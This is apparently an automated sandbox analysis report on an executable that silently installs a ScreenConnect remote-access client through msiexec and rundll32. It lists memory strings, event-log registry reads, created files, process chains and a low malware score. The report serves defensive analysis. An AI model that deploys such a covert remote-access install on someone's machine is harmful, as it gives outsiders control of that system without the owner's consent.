                                  Source: rundll32.exe, 00000004.00000003.1736264146.000000000453B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736264146.00000000045AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1736511091.0000000004433000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/releases/
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                                  Source: f53WqfzzNt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3594358525.000000001DB22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                                  Source: ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                                  Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                                  Source: svchost.exe, 00000009.00000003.1801728222.000001859BF12000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                                  Source: edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                                  Source: edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                                  Source: edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                                  Source: svchost.exe, 00000009.00000003.1801728222.000001859BF12000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                                  Source: svchost.exe, 00000009.00000003.1801728222.000001859BF12000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                                  Source: edb.log.9.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

                                  Spam, unwanted Advertisements and Ransom Demands

                                  barindex
                                  Reads the Security eventlog
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                                  Reads the System eventlog
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                                  System Summary

                                  barindex
                                  Detected potential unwanted application
                                  Source: f53WqfzzNt.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 7_2_05222930 CreateProcessAsUserW,7_2_05222930
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4ec95f.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{14C6E684-39F9-9C17-EDF7-878C827CA860}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBE0.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICBF0.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICFCA.tmpJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4ec961.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\4ec961.msiJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{14C6E684-39F9-9C17-EDF7-878C827CA860}Jump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{14C6E684-39F9-9C17-EDF7-878C827CA860}\DefaultIconJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{14C6E684-39F9-9C17-EDF7-878C827CA860}.SchedServiceConfig.rmiJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)\p3h3t4kq.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (a532d472f1ff1d4e)\p3h3t4kq.newcfgJump to behavior
                                  Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSICBF0.tmpJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 7_2_052200407_2_05220040
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 7_2_052200407_2_05220040
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B2F70088_2_00007FFD9B2F7008
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B2F10D78_2_00007FFD9B2F10D7
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B2F10CF8_2_00007FFD9B2F10CF
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B3024978_2_00007FFD9B302497
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B606AD68_2_00007FFD9B606AD6
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6071938_2_00007FFD9B607193
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B607CF88_2_00007FFD9B607CF8
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6093888_2_00007FFD9B609388
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B6093788_2_00007FFD9B609378
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B60BC018_2_00007FFD9B60BC01
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B60A53F8_2_00007FFD9B60A53F
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B2E700810_2_00007FFD9B2E7008
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B2E10D710_2_00007FFD9B2E10D7
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B2E10CF10_2_00007FFD9B2E10CF
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B60285910_2_00007FFD9B602859
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B5F2C0010_2_00007FFD9B5F2C00
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B5FF01210_2_00007FFD9B5FF012
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B5F5E9010_2_00007FFD9B5F5E90
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B5FE26610_2_00007FFD9B5FE266
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B5F6BB910_2_00007FFD9B5F6BB9
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B5F631910_2_00007FFD9B5F6319
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B5F613D10_2_00007FFD9B5F613D
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFD9B5F6D3910_2_00007FFD9B5F6D39
                                  Source: f53WqfzzNt.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: f53WqfzzNt.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: f53WqfzzNt.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: f53WqfzzNt.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: f53WqfzzNt.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1744890990.0000000005740000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1747609157.0000000005C4C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1747609157.0000000005C4C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1747609157.0000000005C4C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1747609157.0000000005C4C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1745545743.0000000005890000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1745545743.0000000005890000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1745545743.0000000005890000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1745193250.0000000005800000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1726310200.0000000000DD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exe.muiX vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1726310200.0000000000DD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1729382795.0000000004314000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.000000000144F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.000000000144F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1760203980.0000000007C68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1760203980.0000000007C68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1760203980.0000000007C68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1727327219.0000000001720000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exeBinary or memory string: OriginalFilenamezlib.dll2 vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exeBinary or memory string: OriginalFilenamewixca.dll\ vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs f53WqfzzNt.exe
                                  Source: f53WqfzzNt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.2.f53WqfzzNt.exe.5800000.4.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.0.f53WqfzzNt.exe.fac3d4.2.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                                  Source: 0.0.f53WqfzzNt.exe.f263d4.5.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                                  Source: 0.0.f53WqfzzNt.exe.fac3d4.2.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.0.f53WqfzzNt.exe.fac3d4.2.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.0.f53WqfzzNt.exe.fac3d4.2.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                                  Source: classification engineClassification label: mal46.evad.winEXE@18/59@1/2
                                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)Jump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\f53WqfzzNt.exe.logJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMutant created: NULL
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                                  Source: f53WqfzzNt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  Source: f53WqfzzNt.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5161843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                  Source: f53WqfzzNt.exeReversingLabs: Detection: 26%
                                  Source: f53WqfzzNt.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                                  Source: f53WqfzzNt.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeFile read: C:\Users\user\Desktop\f53WqfzzNt.exeJump to behavior
                                  Source: unknownProcess created: C:\Users\user\Desktop\f53WqfzzNt.exe "C:\Users\user\Desktop\f53WqfzzNt.exe"
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi"
                                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 247D8C2517E6E69F0B3D03A8794ECC06 C
                                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5161843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
